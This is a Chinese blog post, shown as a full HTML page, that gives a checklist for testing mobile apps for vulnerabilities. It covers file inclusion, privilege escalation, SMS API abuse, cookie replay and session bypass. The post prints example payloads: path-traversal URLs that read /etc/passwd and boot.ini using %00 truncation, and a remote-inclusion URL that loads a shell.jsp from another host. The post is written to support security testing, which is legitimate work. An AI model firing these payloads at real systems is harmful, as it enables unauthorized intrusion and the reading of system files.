<!doctype html>



  


<html class="theme-next muse use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.2" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="漏洞检测," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.2" />






<meta name="description" content="本地文件包含检查要点是否可以包含本地任意文件
检查对象APP
检查方法1.通过AWVS扫描，查看扫面结果在，是否存在local file include漏洞">
<meta property="og:type" content="article">
<meta property="og:title" content="移动端常见漏洞检测方法">
<meta property="og:url" content="http://yoursite.com/2017/01/11/移动端常见漏洞检测方法/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="本地文件包含检查要点是否可以包含本地任意文件
检查对象APP
检查方法1.通过AWVS扫描，查看扫面结果在，是否存在local file include漏洞">
<meta property="og:updated_time" content="2017-01-11T14:37:26.558Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="移动端常见漏洞检测方法">
<meta name="twitter:description" content="本地文件包含检查要点是否可以包含本地任意文件
检查对象APP
检查方法1.通过AWVS扫描，查看扫面结果在，是否存在local file include漏洞">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Muse',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    }
  };
</script>




  <link rel="canonical" href="http://yoursite.com/2017/01/11/移动端常见漏洞检测方法/"/>


  <title> 移动端常见漏洞检测方法 | Hexo </title>
</head>

<body itemscope itemtype="//schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="//schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Hexo</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle"></p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup">
 <span class="search-icon fa fa-search"></span>
 <input type="text" id="local-search-input">
 <div id="local-search-result"></div>
 <span class="popup-btn-close">close</span>
</div>


    </div>
  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="//schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                移动端常见漏洞检测方法
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2017-01-11T21:47:27+08:00" content="2017-01-11">
              2017-01-11
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/移动端/" itemprop="url" rel="index">
                    <span itemprop="name">移动端</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2017/01/11/移动端常见漏洞检测方法/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2017/01/11/移动端常见漏洞检测方法/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="本地文件包含"><a href="#本地文件包含" class="headerlink" title="本地文件包含"></a>本地文件包含</h2><h3 id="检查要点"><a href="#检查要点" class="headerlink" title="检查要点"></a>检查要点</h3><p>是否可以包含本地任意文件</p>
<h3 id="检查对象"><a href="#检查对象" class="headerlink" title="检查对象"></a>检查对象</h3><p>APP</p>
<h3 id="检查方法"><a href="#检查方法" class="headerlink" title="检查方法"></a>检查方法</h3><p>1.通过AWVS扫描，查看扫面结果在，是否存在local file include漏洞<br><a id="more"></a><br>2.更改参数的值为其他路径和文件进行验证，在浏览器地址栏中尝试一下URL：<br>对于LINUX/UNIX服务器可以尝试包含/etc/passwd<br><a href="http://www.example.com/viewfile?fiilename=../etc/passwd" target="_blank" rel="external">http://www.example.com/viewfile?fiilename=../etc/passwd</a><br>对于Windows服务器可以尝试包含<br><a href="http://www.example.com/viewfile?fiilename=c:\boot.ini文件" target="_blank" rel="external">http://www.example.com/viewfile?fiilename=c:\boot.ini文件</a><br>3.尝试使用截断，来绕过对文件类型的检查，例如：<br><a href="http://www.example.com/viewfile?fiilename=../../../../../../../etc/passwd%00" target="_blank" rel="external">http://www.example.com/viewfile?fiilename=../../../../../../../etc/passwd%00</a></p>
<h3 id="判断条件"><a href="#判断条件" class="headerlink" title="判断条件"></a>判断条件</h3><p>可以包含任意本地文件，如：/etc/passwd或者/boot.ini等，则不通过</p>
<h2 id="远程文件包含"><a href="#远程文件包含" class="headerlink" title="远程文件包含"></a>远程文件包含</h2><h3 id="检查要点-1"><a href="#检查要点-1" class="headerlink" title="检查要点"></a>检查要点</h3><p>是否可以远程包含文件</p>
<h3 id="检查对象-1"><a href="#检查对象-1" class="headerlink" title="检查对象"></a>检查对象</h3><p>APP</p>
<h3 id="检查方法-1"><a href="#检查方法-1" class="headerlink" title="检查方法"></a>检查方法</h3><p>1.通过AWVS扫描，查看扫描结果中，是否存在file include漏洞<br>2.更改参数的值为本机的一个web服务根目录下的一个文件，例如shell.jsp<br><a href="http://www.exmaple.com/viewfile.do?filename=http://192.168.110.160/shell.jsp" target="_blank" rel="external">http://www.exmaple.com/viewfile.do?filename=http://192.168.110.160/shell.jsp</a><br>3.常识使用截断，来绕过对文件类型的检查，例如：<br><a href="http://www.exmaple.com/viewfile.do?filename=http://192.168.110.160/etc/passwd%00" target="_blank" rel="external">http://www.exmaple.com/viewfile.do?filename=http://192.168.110.160/etc/passwd%00</a></p>
<h3 id="判断条件-1"><a href="#判断条件-1" class="headerlink" title="判断条件"></a>判断条件</h3><p>可以包含远程文件，如：包含<a href="http://www.baidu.com，则不通过" target="_blank" rel="external">http://www.baidu.com，则不通过</a></p>
<h2 id="未授权访问"><a href="#未授权访问" class="headerlink" title="未授权访问"></a>未授权访问</h2><h3 id="检查要点-2"><a href="#检查要点-2" class="headerlink" title="检查要点"></a>检查要点</h3><p>是否存在垂直条件提升</p>
<h3 id="检查对象-2"><a href="#检查对象-2" class="headerlink" title="检查对象"></a>检查对象</h3><p>APP</p>
<h3 id="检查方法-2"><a href="#检查方法-2" class="headerlink" title="检查方法"></a>检查方法</h3><p>1.利用“敏感数据扫描工具”在不登陆情况下访问需要账号权限的URL<br>2.查看扫描工具检测结果中可被未授权访问的URL<br>3.对未授权访问的URL进行手工验证</p>
<h3 id="判断条件-2"><a href="#判断条件-2" class="headerlink" title="判断条件"></a>判断条件</h3><p>能访问则不通过 </p>
<h2 id="越权访问"><a href="#越权访问" class="headerlink" title="越权访问"></a>越权访问</h2><h3 id="检查要点-3"><a href="#检查要点-3" class="headerlink" title="检查要点"></a>检查要点</h3><p>1.是否使用低权限可以访问高权限账号的URL<br>2.是否存在同级越权</p>
<h3 id="检查对象-3"><a href="#检查对象-3" class="headerlink" title="检查对象"></a>检查对象</h3><p>APP</p>
<h3 id="检查方法-3"><a href="#检查方法-3" class="headerlink" title="检查方法"></a>检查方法</h3><p>1.低权限账号可以访问高权限账号<br>1)使用高权限账号登陆，抓取一下只有高权限账号才能登陆的URL<br>2)退出高权限账号，使用低权限账号登陆后，尝试访问这些高权限账号能访问的URL<br>2.同级别越权<br>使用A账号能否访问B账号的特定数据，实现越权访问</p>
<h3 id="判断条件-3"><a href="#判断条件-3" class="headerlink" title="判断条件"></a>判断条件</h3><p>低权限账号能访问高权限账号才能访问的URL能不通过；同级权限时，可访问其他账号特定数据，则不通过</p>
<h2 id="短信接口恶意调用"><a href="#短信接口恶意调用" class="headerlink" title="短信接口恶意调用"></a>短信接口恶意调用</h2><h3 id="检查要点-4"><a href="#检查要点-4" class="headerlink" title="检查要点"></a>检查要点</h3><p>是否存在短信接口恶意调用</p>
<h3 id="检查对象-4"><a href="#检查对象-4" class="headerlink" title="检查对象"></a>检查对象</h3><p>APP</p>
<h3 id="检查方法-4"><a href="#检查方法-4" class="headerlink" title="检查方法"></a>检查方法</h3><p>1.在调用短信接口的过程中，使用burp进行抓包，修改发送目标与内容<br>2.查看能否按照预定的发送短信</p>
<h3 id="判断条件-4"><a href="#判断条件-4" class="headerlink" title="判断条件"></a>判断条件</h3><p>能给指定用户发送短信（短信内容可编辑），则不通过</p>
<h2 id="Cookie重放"><a href="#Cookie重放" class="headerlink" title="Cookie重放"></a>Cookie重放</h2><h3 id="检查要点-5"><a href="#检查要点-5" class="headerlink" title="检查要点"></a>检查要点</h3><p>是否存在Cookie重放</p>
<h3 id="检查对象-5"><a href="#检查对象-5" class="headerlink" title="检查对象"></a>检查对象</h3><p>APP</p>
<h3 id="检查方法-5"><a href="#检查方法-5" class="headerlink" title="检查方法"></a>检查方法</h3><p>1.使用burp进行抓包获取一个账号的登录cookie<br>2.在异地使用编辑cookie功能设置刚才抓取的cookie，然后重放该攻击</p>
<h3 id="判断条件-5"><a href="#判断条件-5" class="headerlink" title="判断条件"></a>判断条件</h3><p>能成功利用该cookie则不通过</p>
<h2 id="Session失效"><a href="#Session失效" class="headerlink" title="Session失效"></a>Session失效</h2><h3 id="检查要点-6"><a href="#检查要点-6" class="headerlink" title="检查要点"></a>检查要点</h3><p>是否在关闭浏览器、注销、超时的情况下session失效</p>
<h3 id="检查对象-6"><a href="#检查对象-6" class="headerlink" title="检查对象"></a>检查对象</h3><p>APP</p>
<h3 id="检查方法-6"><a href="#检查方法-6" class="headerlink" title="检查方法"></a>检查方法</h3><p>1.在正常业务操作中，通过burp抓取session id<br>2.在关闭浏览器、注销、超时后分别执行第三步<br>3.使用第一步抓取的session id访问(利用edit cookie访问某需要登录后次啊能访问的URL)</p>
<h3 id="判断条件-6"><a href="#判断条件-6" class="headerlink" title="判断条件"></a>判断条件</h3><p>能访问则不通过</p>
<h2 id="Session绕过"><a href="#Session绕过" class="headerlink" title="Session绕过"></a>Session绕过</h2><h3 id="检查要点-7"><a href="#检查要点-7" class="headerlink" title="检查要点"></a>检查要点</h3><p>是否存在Session绕过</p>
<h3 id="检查对象-7"><a href="#检查对象-7" class="headerlink" title="检查对象"></a>检查对象</h3><p>APP</p>
<h3 id="检查方法-7"><a href="#检查方法-7" class="headerlink" title="检查方法"></a>检查方法</h3><p>1.使用burp进行抓包获取一个正常业务操作的包，并删除session id后提交请求，查看是否可以成功访问</p>
<h3 id="判断条件-7"><a href="#判断条件-7" class="headerlink" title="判断条件"></a>判断条件</h3><p>能访问则不通过</p>
<h2 id="会话无Session校验"><a href="#会话无Session校验" class="headerlink" title="会话无Session校验"></a>会话无Session校验</h2><h3 id="检查要点-8"><a href="#检查要点-8" class="headerlink" title="检查要点"></a>检查要点</h3><p>是否存在会话无Session校验</p>
<h3 id="检查对象-8"><a href="#检查对象-8" class="headerlink" title="检查对象"></a>检查对象</h3><p>APP</p>
<h3 id="检查方法-8"><a href="#检查方法-8" class="headerlink" title="检查方法"></a>检查方法</h3><p>1.在正常业务操作中，对数据访问进行抓包，查看数据包中是否存在session等字段，如果没有，则进行如下操作<br>2.在异地直接打开URL</p>
<h3 id="判断条件-8"><a href="#判断条件-8" class="headerlink" title="判断条件"></a>判断条件</h3><p>能直接打开则不通过</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/漏洞检测/" rel="tag">#漏洞检测</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/01/10/常见安全漏洞及整改建议/" rel="next" title="常见安全漏洞及整改建议">
                <i class="fa fa-chevron-left"></i> 常见安全漏洞及整改建议
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/02/16/渗透测试中常见的端口/" rel="prev" title="渗透测试中常见的端口">
                渗透测试中常见的端口 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
        
<script>
  with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='//bdimg.share.baidu.com/static/api/js/share.js?cdnversion='+~(-new Date()/36e5)];
</script>

      
    </div>
  </div>


          </div>
          

  <p>热评文章</p>
  <div class="ds-top-threads" data-range="weekly" data-num-items="4"></div>


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2017/01/11/移动端常见漏洞检测方法/"
           data-title="移动端常见漏洞检测方法" data-url="http://yoursite.com/2017/01/11/移动端常见漏洞检测方法/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="//schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.jpg"
               alt="小黑胡" />
          <p class="site-author-name" itemprop="name">小黑胡</p>
          <p class="site-description motion-element" itemprop="description">深情不及久伴，厚爱无需多言。</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">20</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">11</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">23</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/ZhengSY1222" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.dadongge.ga" title="大栋哥" target="_blank">大栋哥</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.phodal.com" title="phodal" target="_blank">phodal</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://github.com/w1ng" title="w1ng" target="_blank">w1ng</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://github.com/Afeifan" title="Afeifan" target="_blank">Afeifan</a>
                </li>
              
            </ul>
          </div>
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#本地文件包含"><span class="nav-number">1.</span> <span class="nav-text">本地文件包含</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#检查要点"><span class="nav-number">1.1.</span> <span class="nav-text">检查要点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查对象"><span class="nav-number">1.2.</span> <span class="nav-text">检查对象</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查方法"><span class="nav-number">1.3.</span> <span class="nav-text">检查方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断条件"><span class="nav-number">1.4.</span> <span class="nav-text">判断条件</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#远程文件包含"><span class="nav-number">2.</span> <span class="nav-text">远程文件包含</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#检查要点-1"><span class="nav-number">2.1.</span> <span class="nav-text">检查要点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查对象-1"><span class="nav-number">2.2.</span> <span class="nav-text">检查对象</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查方法-1"><span class="nav-number">2.3.</span> <span class="nav-text">检查方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断条件-1"><span class="nav-number">2.4.</span> <span class="nav-text">判断条件</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#未授权访问"><span class="nav-number">3.</span> <span class="nav-text">未授权访问</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#检查要点-2"><span class="nav-number">3.1.</span> <span class="nav-text">检查要点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查对象-2"><span class="nav-number">3.2.</span> <span class="nav-text">检查对象</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查方法-2"><span class="nav-number">3.3.</span> <span class="nav-text">检查方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断条件-2"><span class="nav-number">3.4.</span> <span class="nav-text">判断条件</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#越权访问"><span class="nav-number">4.</span> <span class="nav-text">越权访问</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#检查要点-3"><span class="nav-number">4.1.</span> <span class="nav-text">检查要点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查对象-3"><span class="nav-number">4.2.</span> <span class="nav-text">检查对象</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查方法-3"><span class="nav-number">4.3.</span> <span class="nav-text">检查方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断条件-3"><span class="nav-number">4.4.</span> <span class="nav-text">判断条件</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#短信接口恶意调用"><span class="nav-number">5.</span> <span class="nav-text">短信接口恶意调用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#检查要点-4"><span class="nav-number">5.1.</span> <span class="nav-text">检查要点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查对象-4"><span class="nav-number">5.2.</span> <span class="nav-text">检查对象</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查方法-4"><span class="nav-number">5.3.</span> <span class="nav-text">检查方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断条件-4"><span class="nav-number">5.4.</span> <span class="nav-text">判断条件</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Cookie重放"><span class="nav-number">6.</span> <span class="nav-text">Cookie重放</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#检查要点-5"><span class="nav-number">6.1.</span> <span class="nav-text">检查要点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查对象-5"><span class="nav-number">6.2.</span> <span class="nav-text">检查对象</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查方法-5"><span class="nav-number">6.3.</span> <span class="nav-text">检查方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断条件-5"><span class="nav-number">6.4.</span> <span class="nav-text">判断条件</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Session失效"><span class="nav-number">7.</span> <span class="nav-text">Session失效</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#检查要点-6"><span class="nav-number">7.1.</span> <span class="nav-text">检查要点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查对象-6"><span class="nav-number">7.2.</span> <span class="nav-text">检查对象</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查方法-6"><span class="nav-number">7.3.</span> <span class="nav-text">检查方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断条件-6"><span class="nav-number">7.4.</span> <span class="nav-text">判断条件</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Session绕过"><span class="nav-number">8.</span> <span class="nav-text">Session绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#检查要点-7"><span class="nav-number">8.1.</span> <span class="nav-text">检查要点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查对象-7"><span class="nav-number">8.2.</span> <span class="nav-text">检查对象</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查方法-7"><span class="nav-number">8.3.</span> <span class="nav-text">检查方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断条件-7"><span class="nav-number">8.4.</span> <span class="nav-text">判断条件</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#会话无Session校验"><span class="nav-number">9.</span> <span class="nav-text">会话无Session校验</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#检查要点-8"><span class="nav-number">9.1.</span> <span class="nav-text">检查要点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查对象-8"><span class="nav-number">9.2.</span> <span class="nav-text">检查对象</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查方法-8"><span class="nav-number">9.3.</span> <span class="nav-text">检查方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断条件-8"><span class="nav-number">9.4.</span> <span class="nav-text">判断条件</span></a></li></ol></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">小黑胡</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Muse
  </a>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.2"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.2"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"akiss-zsy"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
    <script src="/lib/ua-parser-js/dist/ua-parser.min.js?v=0.7.9"></script>
    <script src="/js/src/hook-duoshuo.js"></script>
  






  
  
  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
       search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body").append('<div class="popoverlay">').css('overflow', 'hidden');
      $('.popup').toggle();

    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
    'use strict';
    $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
            // get the contents from search data
            isfetched = true;
            $('.popup').detach().appendTo('.header-inner');
            var datas = $( "entry", xmlResponse ).map(function() {
                return {
                    title: $( "title", this ).text(),
                    content: $("content",this).text(),
                    url: $( "url" , this).text()
                };
            }).get();
            var $input = document.getElementById(search_id);
            var $resultContent = document.getElementById(content_id);
            $input.addEventListener('input', function(){
                var matchcounts = 0;
                var str='<ul class=\"search-result-list\">';
                var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                $resultContent.innerHTML = "";
                if (this.value.trim().length > 1) {
                // perform local searching
                datas.forEach(function(data) {
                    var isMatch = false;
                    var content_index = [];
                    var data_title = data.title.trim().toLowerCase();
                    var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                    var data_url = decodeURIComponent(data.url);
                    var index_title = -1;
                    var index_content = -1;
                    var first_occur = -1;
                    // only match artiles with not empty titles and contents
                    if(data_title != '') {
                        keywords.forEach(function(keyword, i) {
                            index_title = data_title.indexOf(keyword);
                            index_content = data_content.indexOf(keyword);
                            if( index_title >= 0 || index_content >= 0 ){
                                isMatch = true;
								if (i == 0) {
                                    first_occur = index_content;
                                }
                            } 
							
                        });
                    }
                    // show search results
                    if (isMatch) {
                        matchcounts += 1;
                        str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                        var content = data.content.trim().replace(/<[^>]+>/g,"");
                        if (first_occur >= 0) {
                            // cut out 100 characters
                            var start = first_occur - 20;
                            var end = first_occur + 80;
                            if(start < 0){
                                start = 0;
                            }
                            if(start == 0){
                                end = 50;
                            }
                            if(end > content.length){
                                end = content.length;
                            }
                            var match_content = content.substring(start, end);
                            // highlight all keywords
                            keywords.forEach(function(keyword){
                                var regS = new RegExp(keyword, "gi");
                                match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                            });

                            str += "<p class=\"search-result\">" + match_content +"...</p>"
                        }
                        str += "</li>";
                    }
                })};
                str += "</ul>";
                if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
                if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
                $resultContent.innerHTML = str;
            });
            proceedsearch();
        }
    });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };

    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".popoverlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>


  

  

  

  


</body>
</html>
